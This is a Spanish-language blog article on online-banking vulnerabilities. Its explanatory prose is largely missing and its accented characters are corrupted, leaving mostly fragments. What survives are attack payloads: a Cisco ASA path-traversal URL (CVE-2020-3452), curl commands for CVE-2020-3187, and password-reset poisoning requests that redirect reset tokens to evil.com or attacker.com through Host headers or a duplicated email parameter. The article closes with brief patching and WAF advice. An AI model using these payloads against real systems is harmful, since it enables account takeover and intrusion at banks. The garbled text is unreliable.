Clever Geek Handbook

Problemas de seguridad de la banca en l铆nea

隆Hola amigos!





Hoy hablaremos de los problemas urgentes de la seguridad de los sistemas bancarios, analizaremos vulnerabilidades comunes y sacaremos conclusiones en base a los problemas actuales.





Importante

Nuevamente, el autor no garantiza mostrarle c贸mo proteger completamente su sistema de las amenazas cibern茅ticas, solo quiere mostrar a qu茅 problemas debe prestar atenci贸n.





1. Servicios VPN SSL

Los bancos suelen utilizar los servicios VPN SSL de Cisco para organizar el acceso remoto a su red interna.





, .. Cisco CVE-2020-3452 CVE-2020-3187





1.1. CVE-2020-3452

CVE-2020-3452 - Cisco ASA FTD. , , , HTTP- .









https://bank.com/+CSCOT+/translation-table?type=mst&textdomain=/%252bCSCOE%252b/portal_inc.lua&default-language&lang=../









, .





1.2. CVE-2020-3187





/session_password.html 200





curl -k -s -i https://



Cisco-VPN/+CSCOE+/session_password.html







200? -





"/+CSCOU+/csco_logo.gif"







curl -k -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://



Cisco-VPN/+CSCOE+/session_password.html







VPN .





2. & OAuth

- (SSO) OAuth 2.0, , , .





GET /auth/sso/cb?code=[sso token account] HTTP/1.1

Host: bank.com

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close









CSRF . - .





  1. SSO





  2. SSO ,





  3. .





  4. SSO .





redirect_uri - url . / .









POST https://bank.com/reset.php HTTP/1.1

Accept: /

Content-Type: application/json

Host: evil.com











Host: bank.com

X-Forwarded-Host: attacker.com











Host: target.com

Host: attacker.com







email .









https://evil.com/reset-password.php?token=12345678-1234-1234-1234-12345678901





- . , .





.





POST /resetPassword

[鈥

email=victim@email.com&email=attacker@email.com







En la solicitud, puede ver que el atacante simplemente duplic贸 el par谩metro de correo electr贸nico e indic贸 su correo al que se enviar谩 el token de autorizaci贸n.





Producci贸n

Mantenga sus servicios actualizados, ya sea SSL VPN o GlobalProtect.





Mantenga la autenticaci贸n segura





Tambi茅n como consejo, use un firewall de aplicaciones web (  WAF  ) para evitar la explotaci贸n de vulnerabilidades causadas por cambios de c贸digo.





隆Buena suerte! Todo lo mejor.







More articles:


All Articles